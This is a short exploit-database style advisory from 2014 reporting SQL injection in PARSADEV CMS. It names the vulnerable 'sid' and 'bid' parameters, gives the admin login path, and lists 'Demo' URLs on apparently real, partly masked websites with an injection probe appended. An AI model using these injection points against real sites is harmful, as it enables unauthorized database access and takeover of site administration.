# Exploit Title: PARSADEV CMS - SQL Injection Vulnerabilty
# Date : 02-11-2014
# Author : jsass
# Software Link:​ http://www.parsadev.com
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
# Xss by IeDb http://www.exploit4arab.net/exploits/1168
###########
Exploit : http://localhost/iranian/?c=content&sid=1[Sql injection]
Exploit http://localhost/iranian/?c=fanbazar&a=showData&bid=1[Sql injection]
Admin Login : admin/login.php
Demo
http://techXart.ir/en/?c=fanbazar&a=showData&bid=20&did=3712%27
http://pXXac.org.ir/fa/?c=content&sid=45%27
Bye ..
###########
# Greats : alm3refh.com & Sec4ever.com